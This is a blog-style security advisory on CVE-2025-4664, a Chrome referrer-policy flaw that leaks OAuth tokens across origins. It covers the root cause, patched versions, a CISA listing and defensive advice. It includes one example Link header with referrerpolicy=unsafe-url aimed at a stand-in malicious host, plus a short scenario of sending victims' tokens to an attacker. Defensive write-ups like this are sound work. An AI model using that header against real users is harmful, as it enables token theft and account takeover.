High-Severity Referrer-Policy Vulnerability in Google Chrome

byAurora_Feniks -

 

🎯 CVE-2025-4664: High-Severity Referrer-Policy Vulnerability in Google Chrome



📅 Published Date: May 15, 2025


🧠 Overview

CVE-2025-4664 is a critical vulnerability identified in the Loader component of Google Chrome, currently being actively exploited in the wild. It allows attackers to leak sensitive data across origins via specially crafted pages. This poses a serious threat especially to flows using OAuth authentication.


🔍 Technical Analysis 

Root Cause:
Chrome fails to properly enforce the referrer-policy in certain cross-origin Link header scenarios.

Affected Component: 
Loader — the system responsible for managing resource prioritization and preloading behavior.

Referrer-Policy Explanation:
Attackers can manipulate the Link header to force the browser to send full referrer URLs, including sensitive data such as tokens. Example:


Link: <https://malicious-site.com>; rel=preload; as=script; referrerpolicy=unsafe-url

This allows tokens or authorization codes embedded in OAuth URLs to be leaked to third-party sites.


🔓 Exploitation Scenario 

  1. The victim visits a malicious HTML page controlled by the attacker.

  2. The page includes a Link header with referrerpolicy=unsafe-url.

  3. Chrome leaks the full referrer URL (e.g., https://legit-site.com/oauth/callback?token=xyz) to the attacker’s server.

  4. The attacker collects this information and performs account takeover.

This scenario is particularly dangerous in ecosystems that rely on SSO, OAuth2, or OpenID Connect.


🛡️ Google’s Mitigation 

  • Fixed Versions:

    • Windows/Linux: 136.0.7103.113

    • macOS: 136.0.7103.114

  • Patch Summary:

    • Reinforced validation in the Loader component to prevent misuse of referrerpolicy.

    • Updated parsing behavior for Link headers to restrict cross-origin abuse.

🚨 CISA Alert

CISA has added CVE-2025-4664 to its Known Exploited Vulnerabilities (KEV) catalog.
This means the flaw is considered a high-risk threat for public institutions, critical infrastructure providers, and enterprise environments.


🔐 Recommendations – For Cybersecurity Professionals 

1. Enforce Browser Updates
Ensure Chrome is updated organization-wide to the latest patched version.
2. Review Web Application Behavior
Avoid exposing sensitive tokens or parameters (e.g., token, code, state) in URLs. Consider POST-based flows or encrypted state management.
3. Set Strong CSP and Referrer Policies
Apply strict header policies to reduce leakage vectors:


Referrer-Policy: strict-origin

4. Update IDS/IPS Rules
Create detection rules for malicious Link headers using unsafe-url policies.


💡 Final Thoughts

CVE-2025-4664 highlights how misconfigurations in seemingly minor browser behaviors — like referrer-policy — can have wide-reaching consequences. As always, secure-by-default design principles and layered defense strategies remain critical.


📎 References:

Tags

Aurora_Feniks

I have extensive experience working on various projects within the IT field, which has provided me with a comprehensive understanding of all areas related to information technology. My expertise in cyber security and my hands-on experience with current scenarios have given me a well-rounded perspective on security issues.

You might like

View all

Post a Comment

Hello, share your thoughts with us.

Previous Post Next Post

İletişim Formu